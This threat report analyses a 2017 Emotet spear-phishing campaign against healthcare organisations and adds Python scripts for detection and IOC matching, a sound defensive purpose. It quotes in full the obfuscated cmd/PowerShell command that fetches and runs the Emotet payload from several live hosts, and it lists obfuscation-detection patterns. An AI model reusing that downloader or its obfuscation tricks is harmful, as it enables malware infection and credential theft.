
EMOTET Trojan: Blocked by enSilo

During December 2017, enSilo detected and blocked the spread of a malicious Word document (Maldoc) across multiple healthcare entities. The initial stage of the infection was a spear-phishing email: the victims received a message luring them to click on a link that downloads a Maldoc from the Internet. This Maldoc contained an obfuscated macro responsible for performing additional tasks on the victim's system. Once the Maldoc executed, it attempted to leverage Microsoft PowerShell to drop the Emotet Trojan and execute it as the second stage of the attack. Once the Emotet Trojan executed, it attempted to create and delete files, access Windows services, and beacon to command-and-control (C2) domains and remote IP addresses. However, the enSilo Post-Infection Platform successfully detected and blocked the attack chain and prevented the Emotet Trojan from performing its malicious activities on the affected systems.

It is important to note that the spread of the Emotet Trojan via spear-phishing attacks started long before December 2017 and is still actively occurring as of this writing. However, the naming convention of the Maldoc files (as shown in Appendix A) and the period during which enSilo blocked these attacks suggest that the attackers leveraged the holiday season as a social-engineering theme in an effort to get more victims to fall into their holiday trap. The following report includes a preliminary analysis of this attack and an Indicators of Compromise (IOCs) section that provides additional IOCs related to it.

Preliminary Event Analysis

The initial stage of the Emotet Trojan infection was a spear-phishing attack. The victim received an email with the following link (shown here as the argument Firefox was launched with; the URL is defanged):

-osint -url "hXXp://willvinton.net/Your-Holidays-eCard/"

Once the victim clicked on this link, the outlook.exe process spawned the firefox.exe process, and firefox.exe then spawned the winword.exe process, indicating that the Maldoc was downloaded successfully to the victim's system and was then opened by the victim. Figure 1 provides a visual view of this process chain:


Figure 1: Downloading Maldoc

This Maldoc contained a macro with obfuscated code. That code was responsible for dropping and executing the Emotet Trojan payload. Once the user opened this document in Microsoft Word, the winword.exe process spawned cmd.exe with the following obfuscated command line:

cmd.exe jlksjl uuuueueuueue uowe whe h dbsjk bakjbdjkasdbk heo & %C^om^S^p^Ec% /V /c set %cTzbYUaSqLMGrWb%=EAXHDwPLQw&&set %EjXkYfdFwuHUXu%=o^we^r^s&&set %trNbEdzhrDvaBVz%=fXjMhUFw&&set %IcjdFwSDLwFw%=p&&set %zAwpViEnKabiFPH%=jIJiXZiwCItTsiE&&set %UQIBwqzOGaNjjT%=^he^l^l&&set %QYlPdDhILNzHPbt%=QEQQzDXqiZTCthc&&!%IcjdFwSDLwFw%!!%EjXkYfdFwuHUXu%!!%UQIBwqzOGaNjjT%! " . ((variaBle '*MDr*').NaME[3,11,2]-JOin'')( ('.( ([striNG]5VaVE'+'rBosEpREFerence)[1,3]+h0'+'9xh09-JoInh09h09) ( (h09 . ( uwPSHELlid[1]+uwPShELlh09+h09Id[13]+a'+'SVxaSV) ('+' ((aSVwnrfaSV+aSVraSV+aSVaaSV+aSVnaSV+aSV'+'c = nh09+'+'h09aSV+aSV'+'eaSV'+'+aSVw-oh09+h09bjeaS'+'V+'+'aSV'+'ct SaSV+aSVystem.Nh'+'09+h'+'09eaSV+aSVt.WeaSV+aSVbah09+h09SV+aSVClaSh09+h09V+'+'aSVieaSV+aSVnt;wnrnaSV+aSVsadaaSV+aSVsdaSV'+'+aSV =aSV+aSV naSV+aS'+'VeaSV+aSVwaSV+aSV-o'+'baSV+aSVject raSV+aSVandom;wnh09+h09rbaSV+h09+h09aSVcd aSV+aSV=aSV+aSh09+h09V QhKaSV+aS'+'Vht'+'aSV+aSVtaSV+aSVpaSV+aSVs://blog.aSV+aSVsiaSV+aSVplik.com/a'+'SV+aSVvTW5aSV+aSVjaSV'+'+aSVY/,aSV+aSVhtaSV+aSVtp:aSV+aSV//waSV+aSVww.aukaSV+aSVsaSV+ah09+h09SVtejaSV+aSVa.lt/ah09+h09SV+aSVVdkgi'+'aRaSV+aSV/,htt'+'paSV+aSV:aSV+aSV/'+'aSV+aS'+'V/www.noaSV+aSVphh09+h09'+'oaSV+aSVneaSV+aSV.lt/j7aSV+aSVSaSV+aSVoaSV+aSV3aSV+aSVTa'+'SV+h09+h09a'+'SVG/,http:aSV+aSV//waS'+'V+aSVwaSV+aSVw.noraSV+aSVraSV+aSVadju'+'aSV+aSVrgaaSV+aS'+'VraSh09+h09V+aSVdssaSV+aSVtaden.saSV+aSVe/XaSV+a'+'SVQYGro/,htaSV+aSVtp://aSV+aSVwww'+'.danaSV+aSVceall.aSV+'+'aSVlaSV+aSVtaSV+aSV/OIgtBKd/QaSV+h09+h09aSVhK.SaSV+'+'aSVpl'+'aSV+aSViaSV+aSVt(QhKaSV+aSV,QaSV+aSh09+h09VhK);aSV+aSVwnraSV+aSVkaaSV+aSVraSV+aSVapaSV+aSVas = wnaSV+aSVrnsah09+h09SV+a'+'SVadaaSV+aSVsd.aSV+aSVnaS'+'V+'+'aSVext(1, aSV+aSV34aSV+ah09+h09SV3aSV+aSV245);wnrh09+'+'h09aSV+aSVhh09+h'+'09uas = waSV+aSVnreaSV+aSVnv:puaSV+aSVh09+h09baSV+aSVlicaSV+aSV aSV+aSV+ aSV+aSVQhKI0bQ'+'hK + wnrkaraSV+aSVapaSV+aSVas +aSV+aSV aSV+aSVQhh09+h09K.eaSV+aSVxeaSV+aSVQaSV+aSVh09+h09hKaSV+a'+'SV;forea'+'SV+aSVach(wnraSV+aSVaaSV+aSVbc iaSV+aSVnaSV+aSV 
aSV+aSVwnh09+h09aSV+aSVrbch09+h09aSV+aSVd){tryh09'+'+h09{wnaSV+aSVrfranc.Doa'+'SV+aSVwnloaSV+aSVaaSV+aSh09+h09VdF'+'ile'+'(aSV+aSVwaSh09+h09V+aSVnrabc'+'.ToString(),aSV+aSV wnraSV+aSVhaSV+aSVuaaSV+aSVs);'+'aSV+aSVInvokaSV+aSVe-aSV+aSVIaSV+aSV'+'teaS'+'V+aSVm(wnaSV+aSVraSV+aSVhaSV+aSVuaSV+aSVas);braSV+aSVeaSV+aSVaaSV+aSVkaSVh09+h09+aSV;'+'}catchaSV+aSV{write-haS'+'V+'+'aSVostaSV+aSV wnr_ah09+h09SV+aS'+'V.aSV'+'+aSVEaSV+aSVxceptiaSV+aSVoh09+h09naSV+aSV.aSV+ah09+h09SVMe'+'aSV+aSVs'+'sagaSV+aSVe;}}aSV)-CrEpLach09+h09eaSVQhKaSV,[cHAR]39-CrEph09+h09Lace (['+'cHAR]119+[cHAR]110+[cHARh09+h09]114),[cHAR]36 -REPLaCE ([cHAR]73'+'+[cHAR]48+[cHAR]98),'+'[cHAR]92))'+' h09).ReplacE(h09aSVh0'+'9,[stRING][Char]39).ReplacE(h09uwPh09,h095Vah09) ) ').rEpLace(([ChAr]104+[ChAr]48+[ChAr]57),[StrInG][ChAr]39).rEpLace(([ChAr]53+[ChAr]86+[ChAr]97),[StrInG][ChAr]36) )

The cmd.exe process then spawned the PowerShell.exe process with the following command line:

Powershell.exe " . ((variaBle '*MDr*').NaME[3,11,2]-JOin'')( ('.( ([striNG]5VaVE'+'rBosEpREFerence)[1,3]+h0'+'9xh09-JoInh09h09) ( (h09 . ( uwPSHELlid[1]+uwPShELlh09+h09Id[13]+a'+'SVxaSV) ('+' ((aSVwnrfaSV+aSVraSV+aSVaaSV+aSVnaSV+aSV'+'c = nh09+'+'h09aSV+aSV'+'eaSV'+'+aSVw-oh09+h09bjeaS'+'V+'+'aSV'+'ct SaSV+aSVystem.Nh'+'09+h'+'09eaSV+aSVt.WeaSV+aSVbah09+h09SV+aSVClaSh09+h09V+'+'aSVieaSV+aSVnt;wnrnaSV+aSVsadaaSV+aSVsdaSV'+'+aSV =aSV+aSV naSV+aS'+'VeaSV+aSVwaSV+aSV-o'+'baSV+aSVject raSV+aSVandom;wnh09+h09rbaSV+h09+h09aSVcd aSV+aSV=aSV+aSh09+h09V QhKaSV+aS'+'Vht'+'aSV+aSVtaSV+aSVpaSV+aSVs://blog.aSV+aSVsiaSV+aSVplik.com/a'+'SV+aSVvTW5aSV+aSVjaSV'+'+aSVY/,aSV+aSVhtaSV+aSVtp:aSV+aSV//waSV+aSVww.aukaSV+aSVsaSV+ah09+h09SVtejaSV+aSVa.lt/ah09+h09SV+aSVVdkgi'+'aRaSV+aSV/,htt'+'paSV+aSV:aSV+aSV/'+'aSV+aS'+'V/www.noaSV+aSVphh09+h09'+'oaSV+aSVneaSV+aSV.lt/j7aSV+aSVSaSV+aSVoaSV+aSV3aSV+aSVTa'+'SV+h09+h09a'+'SVG/,http:aSV+aSV//waS'+'V+aSVwaSV+aSVw.noraSV+aSVraSV+aSVadju'+'aSV+aSVrgaaSV+aS'+'VraSh09+h09V+aSVdssaSV+aSVtaden.saSV+aSVe/XaSV+a'+'SVQYGro/,htaSV+aSVtp://aSV+aSVwww'+'.danaSV+aSVceall.aSV+'+'aSVlaSV+aSVtaSV+aSV/OIgtBKd/QaSV+h09+h09aSVhK.SaSV+'+'aSVpl'+'aSV+aSViaSV+aSVt(QhKaSV+aSV,QaSV+aSh09+h09VhK);aSV+aSVwnraSV+aSVkaaSV+aSVraSV+aSVapaSV+aSVas = wnaSV+aSVrnsah09+h09SV+a'+'SVadaaSV+aSVsd.aSV+aSVnaS'+'V+'+'aSVext(1, aSV+aSV34aSV+ah09+h09SV3aSV+aSV245);wnrh09+'+'h09aSV+aSVhh09+h'+'09uas = waSV+aSVnreaSV+aSVnv:puaSV+aSVh09+h09baSV+aSVlicaSV+aSV aSV+aSV+ aSV+aSVQhKI0bQ'+'hK + wnrkaraSV+aSVapaSV+aSVas +aSV+aSV aSV+aSVQhh09+h09K.eaSV+aSVxeaSV+aSVQaSV+aSVh09+h09hKaSV+a'+'SV;forea'+'SV+aSVach(wnraSV+aSVaaSV+aSVbc iaSV+aSVnaSV+aSV aSV+aSVwnh09+h09aSV+aSVrbch09+h09aSV+aSVd){tryh09'+'+h09{wnaSV+aSVrfranc.Doa'+'SV+aSVwnloaSV+aSVaaSV+aSh09+h09VdF'+'ile'+'(aSV+aSVwaSh09+h09V+aSVnrabc'+'.ToString(),aSV+aSV 
wnraSV+aSVhaSV+aSVuaaSV+aSVs);'+'aSV+aSVInvokaSV+aSVe-aSV+aSVIaSV+aSV'+'teaS'+'V+aSVm(wnaSV+aSVraSV+aSVhaSV+aSVuaSV+aSVas);braSV+aSVeaSV+aSVaaSV+aSVkaSVh09+h09+aSV;'+'}catchaSV+aSV{write-haS'+'V+'+'aSVostaSV+aSV wnr_ah09+h09SV+aS'+'V.aSV'+'+aSVEaSV+aSVxceptiaSV+aSVoh09+h09naSV+aSV.aSV+ah09+h09SVMe'+'aSV+aSVs'+'sagaSV+aSVe;}}aSV)-CrEpLach09+h09eaSVQhKaSV,[cHAR]39-CrEph09+h09Lace (['+'cHAR]119+[cHAR]110+[cHARh09+h09]114),[cHAR]36 -REPLaCE ([cHAR]73'+'+[cHAR]48+[cHAR]98),'+'[cHAR]92))'+' h09).ReplacE(h09aSVh0'+'9,[stRING][Char]39).ReplacE(h09uwPh09,h095Vah09) ) ').rEpLace(([ChAr]104+[ChAr]48+[ChAr]57),[StrInG][ChAr]39).rEpLace(([ChAr]53+[ChAr]86+[ChAr]97),[StrInG][ChAr]36) )

Thereafter, the PowerShell.exe process spawned the 16877.exe process, which was the Emotet Trojan itself. Figure 2 provides a visual view of this process chain:


Figure 2: Maldoc drops the Emotet Trojan

From this point onwards, the enSilo Post-Infection Platform successfully blocked the attack chain and prevented the Emotet Trojan from performing its malicious activities on the affected system.

Note: The enSilo platform can block these types of attacks at multiple stages: the initial execution, the download of a payload, and the payload execution. However, even if execution is allowed to proceed, the last stage of execution is still blocked.
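The process chain described above (outlook.exe spawning firefox.exe, which spawns winword.exe, which spawns cmd.exe, then powershell.exe, then 16877.exe) and the obfuscation tricks in the quoted command lines are exactly what an endpoint detection rule keys on. The following Python script is an added example written for this page; it is not enSilo's code nor the platform's detection logic. It walks constructed process-creation records (the PIDs, file paths and shortened command lines are made up to mirror the report), flags any cmd.exe or powershell.exe whose ancestry contains an Office application, scores each flagged command line for the obfuscation patterns visible in the quoted lines (caret insertion, environment-variable assembly, delayed expansion, [CHAR] codes, -join/-replace rewriting), and lists whatever a flagged shell spawns next.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (the fields a Sysmon Event ID 1 or EDR sensor provides)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry reproducing the chain in the report, plus one benign Word
# session. The command lines are shortened fragments in the style of the ones quoted above.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "outlook.exe", "outlook.exe"),
    ProcEvent(200, 100, "firefox.exe", 'firefox.exe -osint -url "hXXp://willvinton.net/Your-Holidays-eCard/"'),
    ProcEvent(300, 200, "winword.exe", 'winword.exe "C:\\Users\\victim\\Downloads\\Your Holidays eCard.doc"'),
    ProcEvent(400, 300, "cmd.exe",
              "cmd.exe jlksjl & %C^om^S^p^Ec% /V /c set %cTzb%=EAXH&&set %EjXk%=o^we^r^s"
              "&&!%IcjdFw%!!%EjXk%! \" . ((variaBle '*MDr*').NaME[3,11,2]-JOin'')\""),
    ProcEvent(500, 400, "powershell.exe",
              "powershell.exe \" . ((variaBle '*MDr*').NaME[3,11,2]-JOin'')"
              "( -REPLaCE ([cHAR]73+[cHAR]48+[cHAR]98),[cHAR]92 )\""),
    ProcEvent(600, 500, "16877.exe", "16877.exe"),
    ProcEvent(700, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(800, 700, "winword.exe", 'winword.exe "C:\\Users\\victim\\Documents\\report.docx"'),
    ProcEvent(900, 800, "splwow64.exe", "splwow64.exe 12345"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Each pattern captures one obfuscation trick visible in the quoted command lines.
OBFUSCATION_PATTERNS = {
    "caret_insertion": re.compile(r"\w\^\w"),                        # %C^om^S^p^Ec%
    "env_var_assembly": re.compile(r"\bset\s+%[^%\s]+%=", re.I),      # set %cTzb...%=...
    "delayed_expansion": re.compile(r"![^!\s]+!"),                    # !%var%! under cmd /V
    "char_codes": re.compile(r"\[char\]\s*\d+", re.I),                # [cHAR]39
    "string_rewrite": re.compile(r"-(?:join|replace)\b|\.replace\(", re.I),
}


def obfuscation_score(cmdline):
    """Return (score, reasons): number of distinct obfuscation tricks found and their names."""
    reasons = [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(cmdline)]
    return len(reasons), reasons


def ancestry(pid, by_pid):
    """Image names from the process up to the root, as far as the telemetry reaches (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain


def find_office_spawned_shells(events):
    """Flag cmd/PowerShell processes that have an Office application anywhere in their ancestry."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image.lower() not in SHELLS:
            continue
        chain = ancestry(e.pid, by_pid)
        if any(img in OFFICE for img in chain[1:]):
            score, reasons = obfuscation_score(e.cmdline)
            hits.append({"pid": e.pid, "chain": chain, "score": score, "reasons": reasons})
    return hits


def find_stage2_executions(events, hits):
    """Images started directly by a flagged shell: the second-stage payload (16877.exe here)."""
    flagged = {h["pid"] for h in hits}
    return [e.image.lower() for e in events if e.ppid in flagged and e.image.lower() not in SHELLS]


if __name__ == "__main__":
    hits = find_office_spawned_shells(SAMPLE_EVENTS)
    for h in hits:
        print(f"pid {h['pid']}: {' <- '.join(h['chain'])}  obfuscation={h['score']} {h['reasons']}")
    print("stage-2 payloads:", find_stage2_executions(SAMPLE_EVENTS, hits))
```

The ancestry check matters more than the obfuscation score: Word legitimately spawns helper processes (the benign splwow64.exe session above is never flagged), but Word with a shell anywhere beneath it is rare enough to alert on, and the score then tells the analyst how much of the command line was deliberately hidden.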

About the Emotet Trojan

The Emotet Trojan is malware intended to steal financial information from victims. On execution, it can provide backdoor access into the affected systems, exfiltrate sensitive information such as banking account credentials and passwords, drop and delete additional malware components, and so on. The Emotet Trojan sample detected and blocked by enSilo has the following static characteristics:

Filename:     16877.exe
File Hash:    21f70466f05c1e949a271e16859023f4e121edcd2d9f86ec574cafa2b7f78566
File Size:    114688 Bytes
Compile Time: 2017-12-26 17:32:56

Final Note

This report walked through the process in which the victims received a weaponized Maldoc via a spear-phishing email, all the way through to the execution of the Emotet Trojan dropped by that Maldoc. The filenames involved in this attack and the period in which it occurred suggest that the attackers leveraged the holiday season as a social-engineering lure to get more victims to download and execute their Maldoc. Most importantly, this report shows how enSilo's post-infection protection detected, blocked and prevented the Emotet Trojan from successfully executing on the victims' systems.

Appendix A: Indicators of Compromise

Word Document filenames:

Christmas card.doc
Christmas eCard.doc
Christmas Gift Card.doc
eCard.doc
eGift Card.doc
Gift Card for you.doc
Gift Card.doc
Happy Holidays Card.doc
Holidays Card.doc
Holidays eCard.doc
Holidays gift card.doc
Your Card.doc
Your Christmas Card.doc
Your Christmas Gift Card.doc
Your eCard.doc
Your eGift Card.doc
Your Gift Card.doc
Your Holidays Card.doc
Your Holidays eCard.doc

Malicious Word Document SHA256 Hashes:

123860594ee19f8d1d51ce2a9ee161671429f4b2bcd0dee1ee6c09573c9ba61f
a73924f6b3bc139c6f2365bc45eb1fa7727d6bfcea45ed3f9b21f97995d3daae
c0f716d986545de519029f1ae243d200835ba25e82ba1911617074f1bb3ffe16
9ce27e2c4198d72d91d53eb790f6be33c91ffefb925dafce4f41a6f64fd9c4d1

Initial Malicious Word Document Download URLs:

hxxp://www.beyondphenom.com/eGift-Card/
hxxp://avantif.maindev.fr/Your-Card/
hxxp://balloons-suppliers.com/Christmas-Gift-Card/
hxxp://cfi-diecasting.com/Happy-Holidays-Card/
hxxp://christythematchmaker.com/Gift-Card-for-you/
hxxp://cypersinger.com/Invoice-75314682/
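The indicators above are most useful when they are matched automatically against proxy logs and quarantined files. The following Python script is an added example written for this page, not part of enSilo's report or platform. It loads the Appendix A hashes, filenames and download URLs, re-fangs the hxxp:// URLs, checks constructed proxy-log lines (made up for this example) for exact URL hits, and additionally flags any URL whose last path segment equals one of the lure filenames with spaces replaced by hyphens. That slug mapping is an assumption inferred from the single filename/URL pair the report shows (Your Holidays eCard.doc versus /Your-Holidays-eCard/); such hits are labelled as lower confidence than exact URL matches. It also checks a file's name and SHA256 against the published lists.

```python
import hashlib
import re
from urllib.parse import urlparse

# IOCs copied from Appendix A of the report (URLs defanged as published).
MALDOC_SHA256 = {
    "123860594ee19f8d1d51ce2a9ee161671429f4b2bcd0dee1ee6c09573c9ba61f",
    "a73924f6b3bc139c6f2365bc45eb1fa7727d6bfcea45ed3f9b21f97995d3daae",
    "c0f716d986545de519029f1ae243d200835ba25e82ba1911617074f1bb3ffe16",
    "9ce27e2c4198d72d91d53eb790f6be33c91ffefb925dafce4f41a6f64fd9c4d1",
}
MALDOC_FILENAMES = [
    "Christmas card.doc", "Christmas eCard.doc", "Christmas Gift Card.doc", "eCard.doc",
    "eGift Card.doc", "Gift Card for you.doc", "Gift Card.doc", "Happy Holidays Card.doc",
    "Holidays Card.doc", "Holidays eCard.doc", "Holidays gift card.doc", "Your Card.doc",
    "Your Christmas Card.doc", "Your Christmas Gift Card.doc", "Your eCard.doc",
    "Your eGift Card.doc", "Your Gift Card.doc", "Your Holidays Card.doc", "Your Holidays eCard.doc",
]
DOWNLOAD_URLS = [
    "hxxp://www.beyondphenom.com/eGift-Card/",
    "hxxp://avantif.maindev.fr/Your-Card/",
    "hxxp://balloons-suppliers.com/Christmas-Gift-Card/",
    "hxxp://cfi-diecasting.com/Happy-Holidays-Card/",
    "hxxp://christythematchmaker.com/Gift-Card-for-you/",
    "hxxp://cypersinger.com/Invoice-75314682/",
]

# Constructed proxy-log lines (timestamp user url status); hosts other than the report's are made up.
SAMPLE_PROXY_LOG = """\
2017-12-27T09:14:02Z alice http://www.beyondphenom.com/eGift-Card/ 200
2017-12-27T09:15:40Z bob http://willvinton.net/Your-Holidays-eCard/ 200
2017-12-27T09:16:11Z carol http://intranet.example/Holidays-Card/ 200
2017-12-27T09:17:55Z dave http://www.example.com/newsletter/ 200
"""


def refang(url):
    """Turn a defanged hxxp:// indicator back into a parseable URL."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def maldoc_slugs():
    """Map 'Your Holidays eCard.doc' -> 'your-holidays-ecard', the form seen in the download path.
    Assumption: the naming scheme is consistent (inferred from the one filename/URL pair on the page)."""
    return {name[:-len(".doc")].replace(" ", "-").lower() for name in MALDOC_FILENAMES}


def ioc_url_keys():
    """(host, path) pairs for the published download URLs, normalised for comparison."""
    keys = set()
    for u in DOWNLOAD_URLS:
        p = urlparse(refang(u))
        keys.add((p.netloc.lower(), p.path.lower()))
    return keys


def classify_url(url):
    """'exact_ioc' for a published URL, 'naming_pattern' for the lure naming on an unknown host, else None."""
    p = urlparse(refang(url))
    if (p.netloc.lower(), p.path.lower()) in ioc_url_keys():
        return "exact_ioc"          # high confidence: a published download URL
    if p.path.strip("/").lower() in maldoc_slugs():
        return "naming_pattern"     # lower confidence: same lure naming, host not in the IOC list
    return None


def scan_proxy_log(text):
    """Classify every URL in a whitespace-separated 'timestamp user url status' log."""
    results = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, url, _status = line.split()
        results.append({"ts": ts, "user": user, "url": url, "match": classify_url(url)})
    return results


def classify_file(filename, content):
    """Check a file's name and SHA256 against the published Maldoc indicators."""
    digest = hashlib.sha256(content).hexdigest()
    known_names = {n.lower() for n in MALDOC_FILENAMES}
    return {"name_match": filename.lower() in known_names, "hash_match": digest in MALDOC_SHA256}


if __name__ == "__main__":
    for r in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(r["ts"], r["user"], r["url"], "->", r["match"])
    print(classify_file("Christmas eCard.doc", b"constructed bytes, not a real document"))
```

The naming-pattern check deliberately fires on the willvinton.net URL from the body of the report even though that host is absent from the Appendix A list, which is the point: the lure names are a more durable indicator than any single compromised host. It will also fire on internal paths such as the intranet example, so treat those hits as leads to triage, not verdicts.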
